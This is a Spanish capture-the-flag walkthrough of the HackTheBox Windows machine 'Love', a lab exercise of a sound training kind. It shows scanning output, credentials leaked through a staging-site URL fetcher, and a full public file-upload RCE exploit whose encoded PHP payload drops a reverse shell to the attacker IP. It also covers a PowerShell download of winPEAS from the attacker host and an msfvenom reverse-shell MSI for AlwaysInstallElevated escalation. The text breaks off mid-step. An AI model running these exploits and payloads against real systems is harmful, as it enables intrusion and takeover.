Love es una de las maquinas existentes actualmente en la plataforma de hacking HackTheBox y es de dificultad Fácil.
En este caso se trata de una máquina basada en el Sistema Operativo Windows.
Escaneo de puertos
Como de costumbre, agregamos la IP de la máquina Love 10.10.10.239 a /etc/hosts como love.htb y comenzamos con el escaneo de puertos nmap.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
nmap -p- --min-rate 10000 -oA enumeration/nmap2 10.10.10.239 Warning: 10.10.10.239 giving up on port because retransmission cap hit (10). Nmap scan report for 10.10.10.239 Host is up (0.040s latency). Not shown: 65397 closed tcp ports (conn-refused), 119 filtered tcp ports (no-response) PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 443/tcp open https 445/tcp open microsoft-ds 3306/tcp open mysql 5000/tcp open upnp 5040/tcp open unknown 5985/tcp open wsman 5986/tcp open wsmans 7680/tcp open pando-pub 47001/tcp open winrm 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49668/tcp open unknown 49669/tcp open unknown 49670/tcp open unknown |
Hacemos un primer escaneo para ver los puertos abiertos, y posteriormente hacemos uno más específico con los puertos que nos interesan:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 |
nmap -p 80,135,139,443,445,3306,5000,5040,5985,5986,7680 -sCV -oA enumeration/nmap3 10.10.10.239 Nmap scan report for 10.10.10.239 Host is up (0.077s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 |_http-title: Voting System using PHP 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) | ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in | Not valid before: 2021-01-18T14:00:16 |_Not valid after: 2022-01-18T14:00:16 |_http-title: 403 Forbidden |_ssl-date: TLS randomness does not represent time |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 | tls-alpn: |_ http/1.1 445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP) 3306/tcp open mysql? | fingerprint-strings: | NULL: |_ Host '10.10.14.9' is not allowed to connect to this MariaDB server 5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27) |_http-title: 403 Forbidden |_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27 5040/tcp open unknown 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_ssl-date: 2022-07-20T18:07:28+00:00; +21m34s from scanner time. |_http-server-header: Microsoft-HTTPAPI/2.0 | ssl-cert: Subject: commonName=LOVE | Subject Alternative Name: DNS:LOVE, DNS:Love | Not valid before: 2021-04-11T14:39:19 |_Not valid after: 2024-04-10T14:39:19 |_http-title: Not Found | tls-alpn: |_ http/1.1 7680/tcp open pando-pub? 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port3306-TCP:V=7.92%I=7%D=7/20%Time=62D83EA5%P=x86_64-pc-linux-gnu%r(NU SF:LL,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.9'\x20is\x20not\x20allowe SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server"); Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required | smb-os-discovery: | OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3) | OS CPE: cpe:/o:microsoft:windows_10::- | Computer name: Love | NetBIOS computer name: LOVE\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2022-07-20T11:07:16-07:00 |_clock-skew: mean: 2h06m34s, deviation: 3h30m01s, median: 21m33s | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2022-07-20T18:07:14 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Wed Jul 20 17:45:55 2022 -- 1 IP address (1 host up) scanned in 175.12 seconds |
Y vemos varias cosas interesantes que procederemos a investigar más a fondo en los siguientes puntos.
Enumeración
Investigamos los distintos puertos que vimos anteriormente, en primer lugar el puerto 80
En el portal observamos un portal de login para el cual no tenemos credenciales así que seguiremos investigando.
Verificaremos si podemos hacer algo con el puerto de smb
1 2 |
$ smbclient -N -L //10.10.10.239 session setup failed: NT_STATUS_ACCESS_DENIED |
Pero no tenemos permisos, así que seguimos y revisamos el puerto 3306 de mysql
1 2 |
$ mysql -h 10.10.10.239 ERROR 1130 (HY000): Host '10.10.14.9' is not allowed to connect to this MariaDB server |
Para el cual tampoco tenemos acceso, así que seguimos.
Viendo el portal vamos a revisar el puerto 443
No tenemos permisos para acceder, pero vamos a revisar el certificado existente en el portal:
Y aqui descubrimos varias cosas, por un lado un dominio y un subdominio
1 2 |
love.htb staging.love.htb |
Y una dirección de correo
1 |
roy@love.htb |
Así que vamos a añadir los dominios a nuestro fichero /etc/hosts y accederemos al portal staging.love.htb el cual se ve en la siguiente captura
Revisamos el portal y vemos una página en el enlace de demo donde nos indica que podemos indicar una url
Hacemos alguna prueba con esto pero parece que no lo conseguimos así que probamos con los puertos descubiertos anteriormente y obtenemos una respuesta en el puerto 5000
En el cual obtenemos además unas credenciales:
1 |
Vote Admin Creds admin: @LoveIsInTheAir!!!! |
Probamos con el panel de login que vimos anteriormente pero no son válidas las credenciales así que vamos a enumerar directorios a ver si nos hemos pasado algo por alto, en este caso utilizaremos la herramienta feroxbuster
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 |
$ feroxbuster -u http://love.htb -x php -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt ___ ___ __ __ __ __ __ ___ |__ |__ |__) |__) | / ` / \ \_/ | | \ |__ | |___ | \ | \ | \__, \__/ / \ | |__/ |___ by Ben "epi" Risher 🤓 ver: 2.7.0 ───────────────────────────┬────────────────────── 🎯 Target Url │ http://love.htb 🚀 Threads │ 50 📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt 👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500] 💥 Timeout (secs) │ 7 🦡 User-Agent │ feroxbuster/2.7.0 💉 Config File │ /etc/feroxbuster/ferox-config.toml 💲 Extensions │ [php] 🏁 HTTP methods │ [GET] 🔃 Recursion Depth │ 4 🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest ───────────────────────────┴────────────────────── 🏁 Press [ENTER] to use the Scan Management Menu™ ────────────────────────────────────────────────── 200 GET 126l 324w 4388c http://love.htb/ 301 GET 9l 30w 330c http://love.htb/images => http://love.htb/images/ 301 GET 9l 30w 331c http://love.htb/plugins => http://love.htb/plugins/ 301 GET 9l 30w 329c http://love.htb/admin => http://love.htb/admin/ 301 GET 9l 30w 332c http://love.htb/includes => http://love.htb/includes/ 302 GET 0l 0w 0c http://love.htb/logout.php => index.php 302 GET 0l 0w 0c http://love.htb/login.php => index.php 301 GET 9l 30w 338c http://love.htb/admin/includes => http://love.htb/admin/includes/ 302 GET 0l 0w 0c http://love.htb/admin/login.php => index.php 302 GET 0l 0w 0c http://love.htb/home.php => index.php 302 GET 0l 0w 0c http://love.htb/admin/logout.php => index.php 403 GET 9l 30w 298c http://love.htb/webalizer 302 GET 412l 1114w 0c http://love.htb/admin/home.php => index.php 200 GET 126l 324w 4388c http://love.htb/index.php 403 GET 9l 30w 298c http://love.htb/phpmyadmin 302 GET 5l 47w 397c http://love.htb/admin/print.php => index.php 200 GET 170l 450w 6198c http://love.htb/admin/index.php 302 GET 0l 0w 0c http://love.htb/preview.php => index.php 301 GET 9l 30w 328c http://love.htb/dist => http://love.htb/dist/ 302 GET 379l 1043w 0c http://love.htb/admin/votes.php => index.php 301 GET 9l 30w 329c http://love.htb/tcpdf => http://love.htb/tcpdf/ 403 GET 11l 47w 417c http://love.htb/licenses 403 GET 11l 47w 417c http://love.htb/server-status 302 GET 595l 1513w 0c http://love.htb/admin/candidates.php => index.php 403 GET 9l 30w 298c http://love.htb/con 403 GET 9l 30w 298c http://love.htb/con.php 403 GET 9l 30w 298c http://love.htb/admin/con 403 GET 9l 30w 298c http://love.htb/admin/con.php 403 GET 9l 30w 298c http://love.htb/aux 403 GET 9l 30w 298c http://love.htb/aux.php 403 GET 9l 30w 298c http://love.htb/admin/aux 403 GET 9l 30w 298c http://love.htb/admin/aux.php 302 GET 490l 1277w 0c http://love.htb/admin/positions.php => index.php 302 GET 406l 1038w 0c http://love.htb/admin/ballot.php => index.php 403 GET 9l 30w 298c http://love.htb/error%1F_log 403 GET 9l 30w 298c http://love.htb/error%1F_log.php 403 GET 9l 30w 298c http://love.htb/admin/error%1F_log 403 GET 9l 30w 298c http://love.htb/admin/error%1F_log.php 403 GET 9l 30w 298c http://love.htb/prn 403 GET 9l 30w 298c http://love.htb/prn.php 403 GET 9l 30w 298c http://love.htb/admin/prn 403 GET 9l 30w 298c http://love.htb/admin/prn.php 403 GET 11l 47w 417c http://love.htb/server-info [####################] - 3m 478512/478512 0s found:43 errors:341 [####################] - 3m 53168/53168 229/s http://love.htb [####################] - 3m 53168/53168 225/s http://love.htb/ [####################] - 0s 53168/53168 0/s http://love.htb/images => Directory listing (add -e to scan) [####################] - 0s 53168/53168 0/s http://love.htb/plugins => Directory listing (add -e to scan) [####################] - 3m 53168/53168 227/s http://love.htb/admin [####################] - 0s 53168/53168 0/s http://love.htb/includes => Directory listing (add -e to scan) [####################] - 0s 53168/53168 0/s http://love.htb/admin/includes => Directory listing (add -e to scan) [####################] - 0s 53168/53168 0/s http://love.htb/dist => Directory listing (add -e to scan) [####################] - 0s 53168/53168 0/s http://love.htb/tcpdf => Directory listing (add -e to scan) |
En la anterior enumeración encontramos la url /admin, la cual nos lleva a otra pantalla de login, introducimos las credenciales y entramos al dashboard del portal
Ahora que ya estamos dentro, revisamos un poco el portal por encima y nos vamos a buscar si existe alguna vulnerabilidad con el software “voting system” y encontramos un rce interesante
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 |
$ searchsploit "voting system" --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Online Voting System - Authentication Bypass | php/webapps/43967.py Online Voting System 1.0 - Authentication Bypass (SQLi) | php/webapps/50075.txt Online Voting System 1.0 - Remote Code Execution (Authenticated) | php/webapps/50076.txt Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE) | php/webapps/50088.py Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting | multiple/webapps/49159.txt Voting System 1.0 - Authentication Bypass (SQLI) | php/webapps/49843.txt Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution) | php/webapps/49445.py Voting System 1.0 - Remote Code Execution (Unauthenticated) | php/webapps/49846.txt Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection) | php/webapps/49817.txt WordPress Plugin Poll_ Survey_ Questionnaire and Voting system 1.5.2 - 'date_answers' Blind SQL Injection | php/webapps/50052.txt --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results |
Así que nos copiamos el fichero y editamos el mismo con nuestras credenciales quedando el fichero como se ve a continuación:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 |
# Exploit Title: Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution) # Date: 19/01/2021 # Exploit Author: Richard Jones # Vendor Homepage:https://www.sourcecodester.com/php/12306/voting-system-using-php.html # Software Link: https://www.sourcecodester.com/download-code?nid=12306&title=Voting+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested on: Windows 10 2004 + XAMPP 7.4.4 import requests # --- Edit your settings here ---- IP = "love.htb" # Website's URL USERNAME = "admin" #Auth username PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password REV_IP = "10.10.14.9" # Reverse shell IP REV_PORT = "4444" # Reverse port # -------------------------------- INDEX_PAGE = f"http://{IP}/admin/index.php" LOGIN_URL = f"http://{IP}/admin/login.php" VOTE_URL = f"http://{IP}/admin/voters_add.php" CALL_SHELL = f"http://{IP}/images/shell.php" payload = """ <?php header('Content-type: text/plain'); $ip = "IIPP"; $port = "PPOORRTT"; $payload = "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"; $evalCode = gzinflate(base64_decode($payload)); $evalArguments = " ".$port." ".$ip; $tmpdir ="C:\\windows\\temp"; chdir($tmpdir); $res .= "Using dir : ".$tmpdir; $filename = "D3fa1t_shell.exe"; $file = fopen($filename, 'wb'); fwrite($file, $evalCode); fclose($file); $path = $filename; $cmd = $path.$evalArguments; $res .= "\n\nExecuting : ".$cmd."\n"; echo $res; $output = system($cmd); ?> """ payload = payload.replace("IIPP", REV_IP) payload = payload.replace("PPOORRTT", REV_PORT) s = requests.Session() def getCookies(): r = s.get(INDEX_PAGE) return r.cookies def login(): cookies = getCookies() data = { "username":USERNAME, "password":PASSWORD, "login":"" } r = s.post(LOGIN_URL, data=data, cookies=cookies) if r.status_code == 200: print("Logged in") return True else: return False def sendPayload(): if login(): global payload payload = bytes(payload, encoding="UTF-8") files = {'photo':('shell.php',payload, 'image/png', {'Content-Disposition': 'form-data'} ) } data = { "firstname":"a", "lastname":"b", "password":"1", "add":"" } r = s.post(VOTE_URL, data=data, files=files) if r.status_code == 200: print("Poc sent successfully") else: print("Error") def callShell(): r = s.get(CALL_SHELL, verify=False) if r.status_code == 200: print("Shell called check your listiner") print("Start a NC listner on the port you choose above and run...") sendPayload() callShell() |
Así que vamos a probarlo, levantamos nuestra escucha y ejecutamos
1 2 3 4 |
$ python3 49445.py Start a NC listner on the port you choose above and run... Logged in Poc sent successfully |
Y tenemos acceso en nuestra escucha
1 2 3 4 5 6 7 8 9 10 11 |
$ nc -lvp 4444 listening on [any] 4444 ... connect to [10.10.14.9] from love.htb [10.10.10.239] 61012 b374k shell : connected Microsoft Windows [Version 10.0.19042.867] (c) 2020 Microsoft Corporation. All rights reserved. C:\xampp\htdocs\omrs\images>whoami whoami love\phoebe |
Obteniendo la flag de user
Ahora que estamos dentro, vamos a la home del usuario para conseguir la flag
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
C:\>cd Users\phoebe\Desktop cd Users\phoebe\Desktop C:\Users\Phoebe\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 56DE-BA30 Directory of C:\Users\Phoebe\Desktop 04/13/2021 03:20 AM <DIR> . 04/13/2021 03:20 AM <DIR> .. 07/20/2022 10:53 AM 34 user.txt 1 File(s) 34 bytes 2 Dir(s) 4,126,552,064 bytes free C:\Users\Phoebe\Desktop>type user.txt type user.txt 5xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1 C:\Users\Phoebe\Desktop> |
Escalado de privilegios
Ya tenemos la primera parte, ahora vamos a enumerar para conseguir el escalado a root, y en nuestro caso utilizamos winpeas, así que vamos a descargarlo en la máquina con powershell.
Revisamos en primer lugar la arquitectura de la máquina
1 2 3 4 5 6 7 8 9 |
c:\Users\Phoebe\Documents>systeminfo | findstr "System Type" systeminfo | findstr "System Type" OS Build Type: Multiprocessor Free System Boot Time: 7/20/2022, 10:52:53 AM System Manufacturer: VMware, Inc. System Model: VMware7,1 System Type: x64-based PC System Directory: C:\WINDOWS\system32 System Locale: en-us;English (United States) |
Y descargamos el fichero para x64
1 2 |
c:\Users\Phoebe\Documents>powershell wget http://10.10.14.9:8000/winPEASx64.exe -outfile wp.exe powershell wget http://10.10.14.9:8000/winPEASx64.exe -outfile wp.exe |
Ejecutamos el fichero y descubrimos varias cosas interesantes.
En primer lugar la posibilidad de observar el historial de comandos de powershell ejecutados por el usuario:
1 2 3 4 5 6 7 8 9 |
PowerShell Settings PowerShell v2 Version: 2.0 PowerShell v5 Version: 5.1.19041.1 PowerShell Core Version: Transcription Settings: Module Logging Settings: Scriptblock Logging Settings: PS history file: C:\Users\Phoebe\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt PS history size: 51B |
Por otro lado observamos que podemos escribir en la raíz, es decir, en C:\
1 2 |
Remember that you should search more info inside the other drives C:\ (Type: Fixed)(Filesystem: NTFS)(Available space: 3 GB)(Permissions: Authenticated Users [AppendData/CreateDirectories]) |
Y lo más importante, observamos que AlwaysInstallElevated tiene configurados a 1 los valores en HKLM y HKCU
1 2 3 4 |
Checking AlwaysInstallElevated � https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated AlwaysInstallElevated set to 1 in HKLM! AlwaysInstallElevated set to 1 in HKCU! |
Visto esto último vamos a tratar de escalar privilegios por este método.
Generamos en primer lugar un exploit con msfvenom
1 2 3 4 5 6 |
$ msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.9 LPORT=4445 -f msi -o love.msi [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload No encoder specified, outputting raw payload Payload size: 460 bytes Final size of msi file: 159744 bytes Saved as: love.msi |
Lo subimos a la máquina
1 2 |
